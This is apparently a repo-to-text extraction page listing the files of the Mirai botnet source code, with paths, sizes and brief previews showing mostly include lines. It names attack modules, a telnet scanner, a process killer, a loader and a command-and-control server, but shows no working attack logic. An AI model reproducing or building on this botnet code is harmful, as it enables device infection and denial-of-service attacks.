"path": "loader/src/server.c",
"chars": 24383,
"preview": "#define _GNU_SOURCE\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <pthread.h>\n#include <sys/epoll.h>\n#include <sys/so"
},
{
"path": "loader/src/telnet_info.c",
"chars": 1580,
"preview": "#include <stdio.h>\n#include <stdint.h>\n#include <stdlib.h>\n#include <string.h>\n#include \"headers/includes.h\"\n#include \"h"
},
{
"path": "loader/src/util.c",
"chars": 3765,
"preview": "#include <stdint.h>\n#include <sys/socket.h>\n#include <arpa/inet.h>\n#include <fcntl.h>\n#include <stdio.h>\n#include <strin"
},
{
"path": "mirai/bot/attack.c",
"chars": 5937,
"preview": "#define _GNU_SOURCE\n\n#ifdef DEBUG\n#include <stdio.h>\n#endif\n#include <stdlib.h>\n#include <unistd.h>\n#include <signal.h>\n"
},
{
"path": "mirai/bot/attack.h",
"chars": 6787,
"preview": "#pragma once\n\n#include <time.h>\n#include <arpa/inet.h>\n#include <linux/ip.h>\n#include <linux/udp.h>\n#include <linux/tcp."
},
{
"path": "mirai/bot/attack_app.c",
"chars": 48047,
"preview": "#define _GNU_SOURCE\n\n#ifdef DEBUG\n#include <stdio.h>\n#endif\n#include <stdlib.h>\n#include <unistd.h>\n#include <sys/socket"
},
{
"path": "mirai/bot/attack_gre.c",
"chars": 11221,
"preview": "#define _GNU_SOURCE\n\n#ifdef DEBUG\n#include <stdio.h>\n#endif\n#include <stdlib.h>\n#include <unistd.h>\n#include <sys/socket"
},
{
"path": "mirai/bot/attack_tcp.c",
"chars": 17710,
"preview": "#define _GNU_SOURCE\n\n#ifdef DEBUG\n#include <stdio.h>\n#endif\n#include <stdlib.h>\n#include <unistd.h>\n#include <sys/socket"
},
{
"path": "mirai/bot/attack_udp.c",
"chars": 17241,
"preview": "#define _GNU_SOURCE\n\n#ifdef DEBUG\n#include <stdio.h>\n#endif\n#include <stdlib.h>\n#include <unistd.h>\n#include <sys/socket"
},
{
"path": "mirai/bot/checksum.c",
"chars": 1073,
"preview": "#define _GNU_SOURCE\n\n#include <arpa/inet.h>\n#include <linux/ip.h>\n\n#include \"includes.h\"\n#include \"checksum.h\"\n\nuint16_t"
},
{
"path": "mirai/bot/checksum.h",
"chars": 194,
"preview": "#pragma once\n\n#include <stdint.h>\n#include <linux/ip.h>\n\n#include \"includes.h\"\n\nuint16_t checksum_generic(uint16_t *, ui"
},
{
"path": "mirai/bot/includes.h",
"chars": 2937,
"preview": "#pragma once\n\n#include <unistd.h>\n#include <stdint.h>\n#include <stdarg.h>\n\n#define STDIN 0\n#define STDOUT 1\n#define S"
},
{
"path": "mirai/bot/killer.c",
"chars": 16027,
"preview": "#define _GNU_SOURCE\n\n#ifdef DEBUG\n#include <stdio.h>\n#endif\n#include <unistd.h>\n#include <stdlib.h>\n#include <arpa/inet."
},
{
"path": "mirai/bot/killer.h",
"chars": 459,
"preview": "#pragma once\n\n#include \"includes.h\"\n\n#define KILLER_MIN_PID 400\n#define KILLER_RESTART_SCAN_TIME 600\n\n#d"
},
{
"path": "mirai/bot/main.c",
"chars": 14075,
"preview": "#define _GNU_SOURCE\n\n#ifdef DEBUG\n#include <stdio.h>\n#endif\n#include <stdlib.h>\n#include <unistd.h>\n#include <sys/socket"
},
{
"path": "mirai/bot/protocol.h",
"chars": 613,
"preview": "#pragma once\n\n#include <stdint.h>\n\n#include \"includes.h\"\n\nstruct dnshdr {\n uint16_t id, opts, qdcount, ancount, nscou"
},
{
"path": "mirai/bot/rand.c",
"chars": 1725,
"preview": "#define _GNU_SOURCE\n\n#include <stdint.h>\n#include <unistd.h>\n#include <stdlib.h>\n#include <time.h>\n\n#include \"includes.h"
},
{
"path": "mirai/bot/rand.h",
"chars": 171,
"preview": "#pragma once\n\n#include <stdint.h>\n\n#define PHI 0x9e3779b9\n\nvoid rand_init(void);\nuint32_t rand_next(void);\nvoid rand_str"
},
{
"path": "mirai/bot/resolv.c",
"chars": 6235,
"preview": "#define _GNU_SOURCE\n\n#ifdef DEBUG\n#include <stdio.h>\n#endif\n#include <stdint.h>\n#include <stdlib.h>\n#include <unistd.h>\n"
},
{
"path": "mirai/bot/resolv.h",
"chars": 252,
"preview": "#pragma once\n\n#include \"includes.h\"\n\nstruct resolv_entries {\n uint8_t addrs_len;\n ipv4_t *addrs;\n};\n\nvoid resolv_d"
},
{
"path": "mirai/bot/scanner.c",
"chars": 36742,
"preview": "#define _GNU_SOURCE\n\n#ifdef MIRAI_TELNET\n\n#ifdef DEBUG\n#include <stdio.h>\n#endif\n#include <unistd.h>\n#include <stdlib.h>"
},
{
"path": "mirai/bot/scanner.h",
"chars": 1678,
"preview": "#pragma once\n\n#include <stdint.h>\n\n#include \"includes.h\"\n\n#ifdef DEBUG\n#define SCANNER_MAX_CONNS 128\n#define SCANNER_R"
},
{
"path": "mirai/bot/table.c",
"chars": 9112,
"preview": "#define _GNU_SOURCE\n\n#ifdef DEBUG\n#include <stdio.h>\n#endif\n#include <stdint.h>\n#include <stdlib.h>\n\n#include \"includes."
},
{
"path": "mirai/bot/table.h",
"chars": 4319,
"preview": "#pragma once\n\n#include <stdint.h>\n#include \"includes.h\"\n\nstruct table_value {\n char *val;\n uint16_t val_len;\n#ifde"
},
{
"path": "mirai/bot/util.c",
"chars": 5317,
"preview": "#define _GNU_SOURCE\n\n#ifdef DEBUG\n#include <stdio.h>\n#endif\n#include <stdlib.h>\n#include <arpa/inet.h>\n#include <unistd."
},
{
"path": "mirai/bot/util.h",
"chars": 606,
"preview": "#pragma once\n\n#include \"includes.h\"\n\nint util_strlen(char *);\nBOOL util_strncmp(char *, char *, int);\nBOOL util_strcmp(c"
},
{
"path": "mirai/build.sh",
"chars": 2884,
"preview": "#!/bin/bash\n\nFLAGS=\"\"\n\nfunction compile_bot {\n \"$1-gcc\" -std=c99 $3 bot/*.c -O3 -fomit-frame-pointer -fdata-sections "
},
{
"path": "mirai/cnc/admin.go",
"chars": 9702,
"preview": "package main\n\nimport (\n \"fmt\"\n \"net\"\n \"time\"\n \"strings\"\n \"io/ioutil\"\n \"strconv\"\n)\n\ntype Admin struct {"
},
{
"path": "mirai/cnc/api.go",
"chars": 2486,
"preview": "package main\n\nimport (\n \"net\"\n \"time\"\n \"strings\"\n \"strconv\"\n)\n\ntype Api struct {\n conn net.Conn\n}\n\nfun"
},
{
"path": "mirai/cnc/attack.go",
"chars": 10631,
"preview": "package main\n\nimport (\n \"fmt\"\n \"strings\"\n \"strconv\"\n \"net\"\n \"encoding/binary\"\n \"errors\"\n \"github.co"
},
{
"path": "mirai/cnc/bot.go",
"chars": 726,
"preview": "package main\n\nimport (\n \"net\"\n \"time\"\n)\n\ntype Bot struct {\n uid int\n conn net.Conn\n version byte\n "
},
{
"path": "mirai/cnc/clientList.go",
"chars": 3312,
"preview": "package main\n\nimport (\n \"time\"\n \"math/rand\"\n \"sync\"\n \"fmt\"\n)\n\ntype AttackSend struct {\n buf []byt"
},
{
"path": "mirai/cnc/constants.go",
"chars": 2198,
"preview": "package main\n\nconst MiraiPrompt = `\n Ü\u001b[1;41m±²\u001b[40mß\u001b[41m²±\u001b[0;31mÜ Ü\u001b[1;41m±²\u001b[1C²±\u001b[0;31mÜ Ü\u001b[1;41m±²\u001b[40m\u001b[A\n\u001b[20C\u001b["
},
{
"path": "mirai/cnc/database.go",
"chars": 5078,
"preview": "package main\n\nimport (\n \"database/sql\"\n \"fmt\"\n \"net\"\n \"encoding/binary\"\n _ \"github.com/go-sql-driver/mysq"
},
{
"path": "mirai/cnc/main.go",
"chars": 2459,
"preview": "package main\n\nimport (\n \"fmt\"\n \"net\"\n \"errors\"\n \"time\"\n)\n\nconst DatabaseAddr string = \"127.0.0.1\"\nconst Da"
},
{
"path": "mirai/prompt.txt",
"chars": 25,
"preview": "я люблю куриные наггетсы\n"
},
{
"path": "mirai/tools/badbot.c",
"chars": 172,
"preview": "#include <stdio.h>\n#include <unistd.h>\n\nint main(int argc, char **args)\n{\n printf(\"REPORT %s:%s\\n\", \"127.0.0.1\", \"80\""
},
{
"path": "mirai/tools/enc.c",
"chars": 2476,
"preview": "#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <stdint.h>\n#include <arpa/inet.h>\n\nstatic uint32_t t"
},
{
"path": "mirai/tools/nogdb.c",
"chars": 1393,
"preview": "#include <stdio.h>\n#include <sys/mman.h>\n#include <unistd.h>\n#include <stdlib.h>\n#include <elf.h>\n#include <sys/stat.h>\n"
},
{
"path": "mirai/tools/scanListen.go",
"chars": 1965,
"preview": "package main\n\nimport (\n \"fmt\"\n \"net\"\n \"encoding/binary\"\n \"errors\"\n \"time\"\n)\n\nfunc main() {\n l, err := "
},
{
"path": "mirai/tools/single_load.c",
"chars": 33922,
"preview": "#define _GNU_SOURCE\n\n#include <assert.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <stdarg.h>\n#include <unistd.h>\n"
},
{
"path": "mirai/tools/wget.c",
"chars": 4093,
"preview": "#include <sys/types.h>\n//#include <bits/syscalls.h>\n#include <sys/syscall.h>\n#include <fcntl.h>\n#include <sys/socket.h>\n"
},
{
"path": "scripts/cross-compile.sh",
"chars": 4169,
"preview": "#!/bin/bash\n\nif [ \"$(id -u)\" != \"0\" ]; then\n echo \"This script must be run as root\" 1>&2\n exit 1\nfi\n\necho -n \"Instal"
},
{
"path": "scripts/db.sql",
"chars": 1046,
"preview": "CREATE DATABASE mirai;\n\nCREATE TABLE `history` (\n `id` int(10) unsigned NOT NULL AUTO_INCREMENT,\n `user_id` int(10) un"
}
]
// ... and 17 more files (download for full content)
About this extraction
This page contains the full source code of the jgamblin/Mirai-Source-Code GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 78 files (419.3 KB), approximately 114.5k tokens, and a symbol index with 379 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.